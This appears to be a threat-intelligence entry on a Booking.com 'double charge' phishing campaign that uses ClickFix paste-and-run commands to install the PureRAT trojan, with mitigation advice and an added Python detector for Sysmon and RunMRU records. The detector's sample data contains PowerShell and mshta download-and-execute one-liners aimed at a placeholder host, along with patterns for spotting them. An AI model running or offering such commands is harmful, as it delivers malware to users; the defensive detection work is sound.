“I Paid Twice” Scam Infects Booking.com and Other Booking Sites' Users with PureRAT via ClickFix
The “I Paid Twice” scam targets users of Booking.com and other booking platforms. Victims are told that a reservation was charged twice and are steered to a fraudulent page or message to “resolve” the duplicate payment. The lure ends in a ClickFix step: rather than a download, the page instructs the victim to copy a command and run it themselves, and that command fetches and installs PureRAT, a commodity remote access trojan that steals credentials and other sensitive data and gives the operator persistent access to the machine. No software vulnerability is exploited; the chain depends entirely on user action and on trust in a well-known travel brand, which lets it sidestep attachment scanning and browser download warnings. European organizations and individuals using these platforms are at risk given the high volume of travel-related transactions. Mitigation requires user education, email and web filtering, endpoint controls on the paste-and-run step, and monitoring for unusual account activity. Countries with high tourism activity and heavy Booking.com use, such as Germany, France and the UK, are the most likely targets.
AI Analysis
Technical Summary
The “I Paid Twice” scam is a phishing campaign aimed at users of Booking.com and other online booking platforms. The lure claims that the victim's reservation was charged twice and offers a link to fix or refund the duplicate payment. Instead of an attachment or a conventional download, the final stage is ClickFix, a social engineering technique rather than a tool: the fraudulent page shows a fake error, CAPTCHA or “verification” prompt and tells the victim to press Win+R (or open a terminal), paste a command the page has placed on the clipboard, and hit Enter. That command, typically a PowerShell or mshta one-liner, downloads and executes the next stage, so the victim installs the malware themselves and no file ever passes through mail attachment scanning or a browser download warning. The payload is PureRAT, a .NET remote access trojan from the commercially sold Pure malware family. Once running it gives the operator persistent remote control of the host, can harvest credentials and personal and payment data, and can be used to stage further tooling or move laterally if the host sits on a corporate network. The campaign reaches victims through email and through fake pages that imitate legitimate booking services. No vulnerability is exploited; success depends entirely on persuading the user to run the command, which is why user vigilance and endpoint controls matter more than patching here. Public technical detail is limited: this entry's source is a hackread.com article shared to r/InfoSecNews, with minimal discussion so far. The paste-and-run step is also the campaign's weak point for defenders, because it leaves distinctive artefacts (a script host spawned by explorer.exe, an entry in the user's RunMRU registry key) that endpoint telemetry can catch.
Potential Impact
For European organizations the impact includes compromise of employee and customer credentials, unauthorized access to corporate networks, and breaches of personal and payment data. Travel, hospitality and finance organizations are the most exposed because their staff handle booking-platform messages and payments daily, and a hotel or agency workstation infected with PureRAT gives the attacker a persistent backdoor from which to spy, steal data, reach partner and payment systems, or drop further malware such as ransomware. Brand damage follows when customers associate a hotel, agency or platform with the fraud. The need for user interaction limits the scope somewhat, but Europe's high volume of travel bookings and heavy reliance on Booking.com make the potential victim pool large, and attacks timed to peak travel seasons would amplify the effect. Third-party vendors and supply-chain partners connected to booking platforms may also be affected, extending the reach of a single compromised account.
Mitigation Recommendations
European organizations should run targeted awareness campaigns on travel-booking phishing, with two concrete messages: refund and double-charge claims are verified only inside the platform's own app or website, never through a link in the message, and no legitimate booking site or hotel will ever ask a user to press Win+R and paste a command. Deploy email filtering that catches booking-themed lures and lookalike sender domains, and web filtering that blocks known ClickFix and PureRAT infrastructure. On endpoints, take away the paste-and-run step where possible: remove the Run dialog for standard users with the Group Policy “Remove Run menu from Start Menu”, restrict mshta.exe and unsigned script execution with AppLocker or WDAC, and enable PowerShell script block logging (Event ID 4104) together with Sysmon process-creation logging (Event ID 1). Alert on powershell.exe, mshta.exe or cmd.exe spawned by explorer.exe with hidden, encoded or URL-bearing command lines, and hunt HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU for pasted commands. Enforce multi-factor authentication on booking-platform and corporate email accounts, but note that a RAT on the endpoint can ride already-authenticated sessions, so treat an infected host as fully compromised and reset its users' credentials and sessions after cleanup. Keep endpoint protection current, make it easy for users to report suspicious messages, and have an incident response procedure ready for a confirmed infection. Share indicators and suspicious transactions with the booking platforms, and run periodic phishing simulations that include the paste-and-run step, not just a link click.
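As an added example that is not part of the page, the hackread.com article or any vendor's tooling, the Python script below turns the detection advice above, and the ClickFix mechanics described in the Technical Summary, into a runnable check: it scores Sysmon Event ID 1 process-creation records and Explorer RunMRU values for the traits a pasted ClickFix command usually has. The event dictionaries and the RunMRU export are constructed for illustration; field names follow Sysmon's ProcessCreate schema, example.invalid is a placeholder domain, and the two-trait threshold is this example's own choice, not a published rule. Because the page carries no PureRAT indicators, the check targets the delivery stage rather than the RAT itself.

```python
"""Heuristic detection for the ClickFix paste-and-run stage.

Added example, not code from the page or from any vendor. It scores
Sysmon Event ID 1 (process creation) records and Explorer RunMRU values
for traits a ClickFix command usually has: a script host spawned by
explorer.exe, a hidden window, an encoded or download-and-execute
command line, a remote URL, and CAPTCHA-style decoy text. All sample
data is constructed; example.invalid is a placeholder domain.
"""
import base64
import re
from dataclasses import dataclass, field

# Script hosts and LOLBins a ClickFix one-liner is typically pasted into.
LAUNCHERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe",
             "cscript.exe", "curl.exe", "bitsadmin.exe", "msiexec.exe"}
# explorer.exe hosts both the Win+R Run dialog and the File Explorer address bar.
RUN_DIALOG_PARENTS = {"explorer.exe"}

ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)
SUSPICIOUS = [
    (re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I), "hidden window"),
    (ENCODED_ARG, "encoded command"),
    (re.compile(r"\b(?:iex|invoke-expression|invoke-webrequest|iwr|downloadstring|"
                r"downloadfile|start-bitstransfer)\b", re.I), "download-and-execute cmdlet"),
    (re.compile(r"https?://", re.I), "remote URL"),
    (re.compile(r"\bmshta(?:\.exe)?\s+https?://", re.I), "mshta loading remote HTA"),
    (re.compile(r"not a robot|captcha|verification id|i am human", re.I),
     "CAPTCHA-themed decoy text"),
]


@dataclass
class Finding:
    record_id: str
    command: str
    reasons: list = field(default_factory=list)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded(cmdline: str) -> str:
    """Return the plaintext of a PowerShell -EncodedCommand argument, else ''."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return ""
    try:  # -enc payloads are base64 over UTF-16LE
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:  # binascii.Error is a ValueError
        return ""


def _reasons(cmdline: str) -> list:
    text = cmdline + "\n" + decode_encoded(cmdline)  # scan the decoded form too
    return [why for pat, why in SUSPICIOUS if pat.search(text)]


def _first_token_is_launcher(cmd: str) -> bool:
    parts = cmd.strip().split()
    if not parts:
        return False
    name = _basename(parts[0].strip('"'))
    return (name if name.endswith(".exe") else name + ".exe") in LAUNCHERS


def analyse_event(event: dict):
    """Score one process-creation record; return a Finding or None."""
    if _basename(event.get("Image", "")) not in LAUNCHERS:
        return None
    reasons = []
    if _basename(event.get("ParentImage", "")) in RUN_DIALOG_PARENTS:
        reasons.append("spawned by explorer.exe (Run dialog / address bar)")
    cmd = event.get("CommandLine", "")
    reasons += _reasons(cmd)
    # Requiring two independent traits avoids flagging ordinary admin use.
    return Finding(event.get("id", "?"), cmd, reasons) if len(reasons) >= 2 else None


def scan_events(events) -> list:
    return [f for f in (analyse_event(e) for e in events) if f]


def scan_runmru(values: dict) -> list:
    """Flag RunMRU entries. Value data is the typed command followed by '\\1'."""
    hits = []
    for name, data in values.items():
        if name == "MRUList":  # ordering key, not a command
            continue
        cmd = data.removesuffix("\\1")
        reasons = (["script host invoked from Run dialog"] if _first_token_is_launcher(cmd) else [])
        reasons += _reasons(cmd)
        if len(reasons) >= 2:
            hits.append(Finding(name, cmd, reasons))
    return hits


# Constructed sample data (hypothetical), in Sysmon ProcessCreate field names.
ENC = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"
    .encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"id": "1", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell.exe -w hidden -c "iex (iwr http://example.invalid/verify.txt).Content"'
                    ' # "I am not a robot - reCAPTCHA Verification ID: 9201"'},
    {"id": "2", "Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://example.invalid/booking-refund.hta"},
    {"id": "3", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell -enc " + ENC},
    {"id": "4", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},  # benign
    {"id": "5", "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},  # benign
]
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "http://intranet.example.invalid\\1",  # benign: Run just opens a browser
    "c": 'powershell -w hidden -c "iex(iwr http://example.invalid/v.txt)"\\1',
}

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS) + scan_runmru(SAMPLE_RUNMRU):
        print(f.record_id, "|", ", ".join(f.reasons))
```

To run it on real data, convert Sysmon events to dictionaries (for instance from `Get-WinEvent` output) and export the user's RunMRU key; any hit on a hotel, agency or travel-desk workstation should be treated as a PureRAT infection until proven otherwise, because the pasted command is the last observable step before the RAT lands.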
Affected Countries
Germany, France, United Kingdom, Italy, Spain, Netherlands
Technical Details
- Source Type: Subreddit
- Subreddit: InfoSecNews
- Reddit Score: 2
- Discussion Level: minimal
- Content Source: reddit_link_post
- Domain: hackread.com
- Newsworthiness Assessment: score 27.2; reasons: external_link, established_author, very_recent; newsworthy: true
- Has External Source: true
- Trusted Domain: false
Threat ID: 690e17380d6e36ffa27aa06b
Added to database: 11/7/2025, 3:58:48 PM
Last enriched: 11/7/2025, 3:59:06 PM
Last updated: 11/8/2025, 5:12:27 AM